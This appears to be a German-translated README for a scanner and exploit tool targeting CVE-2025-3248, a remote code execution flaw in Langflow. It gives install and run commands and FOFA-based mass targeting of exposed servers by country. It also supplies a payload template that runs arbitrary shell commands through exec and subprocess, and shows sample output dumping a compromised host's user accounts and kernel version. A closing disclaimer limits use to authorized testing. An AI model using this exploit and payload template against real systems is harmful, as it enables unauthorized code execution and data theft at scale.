
Ein Schwachstellen-Scanner für CVE-2025-3248 in Langflow-Anwendungen. Ein Tool zum Scannen der Schwachstelle CVE-2025-3248 in Langflow-Anwendungen.
中文 | Englisch
Ein Schwachstellenscanner für CVE-2025-3248 in Langflow-Anwendungen.
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
# After you finish editing
mv .env.example .env
python main.py -t https://target.com
python main.py --fofa-email [email protected] --fofa-key your_api_key
-t, --target: Ziel-URL zum Scannen--fofa-email: FOFA-API-E-Mail--fofa-key: FOFA-API-Schlüssel--fofa-query: FOFA-Suchabfrage (Standard: 'app="LOGSPACE-LangFlow"')--country: Ergebnisse nach Ländercode filtern (z.B. CN, US)--max-pages: Maximale Anzahl abzurufender FOFA-Seiten (Standard: 5)--page-size: Ergebnisse pro Seite (Standard: 100)--timeout: Anforderungs-Timeout in Sekunden (Standard: 10)--no-verify: SSL-Verifizierung deaktivieren--threads: Anzahl der Threads für paralleles Scannen (Standard: 5)-f, --file: Benutzerdefinierte Python-Datei als Payload verwendenSie können benutzerdefinierte Payloads erstellen, indem Sie eine Python-Datei erstellen:
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
pass
Dann verwenden Sie es mit:
python main.py -t https://target.com -f your_payload.py
[+] User Accounts:
root UID:0 GID:0 Home:/root Shell:/bin/bash
daemon UID:1 GID:1 Home:/usr/sbin Shell:/usr/sbin/nologin
bin UID:2 GID:2 Home:/bin Shell:/usr/sbin/nologin
sys UID:3 GID:3 Home:/dev Shell:/usr/sbin/nologin
sync UID:4 GID:65534 Home:/bin Shell:/bin/sync
games UID:5 GID:60 Home:/usr/games Shell:/usr/sbin/nologin
man UID:6 GID:12 Home:/var/cache/man Shell:/usr/sbin/nologin
lp UID:7 GID:7 Home:/var/spool/lpd Shell:/usr/sbin/nologin
mail UID:8 GID:8 Home:/var/mail Shell:/usr/sbin/nologin
news UID:9 GID:9 Home:/var/spool/news Shell:/usr/sbin/nologin
uucp UID:10 GID:10 Home:/var/spool/uucp Shell:/usr/sbin/nologin
proxy UID:13 GID:13 Home:/bin Shell:/usr/sbin/nologin
www-data UID:33 GID:33 Home:/var/www Shell:/usr/sbin/nologin
backup UID:34 GID:34 Home:/var/backups Shell:/usr/sbin/nologin
list UID:38 GID:38 Home:/var/list Shell:/usr/sbin/nologin
irc UID:39 GID:39 Home:/run/ircd Shell:/usr/sbin/nologin
_apt UID:42 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
nobody UID:65534 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
user UID:1000 GID:0 Home:/app/data Shell:/bin/sh
[+] System Details:
Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux
⚠️ Haftungsausschluss Dieses Tool dient nur legalen Zwecken. Es wurde für Bildungszwecke, interne Unternehmenssicherheitstests oder die Nutzung in autorisierten Umgebungen entwickelt. Die Verwendung dieses Tools auf nicht autorisierten Systemen, Netzwerken oder Geräten ist strengstens untersagt, da dies gegen geltende Gesetze und Vorschriften verstoßen könnte.
Benutzer tragen die volle rechtliche Verantwortung für ihre Handlungen. Der Autor und die Mitwirkenden übernehmen keine Haftung für Verluste, Datenlecks oder rechtliche Konsequenzen, die durch unsachgemäße Verwendung dieses Tools entstehen.
⚠️ Nicht für illegale Angriffe verwenden. Versuchen Sie nicht, dieses Tool auf nicht autorisierten Systemen zu installieren oder auszuführen.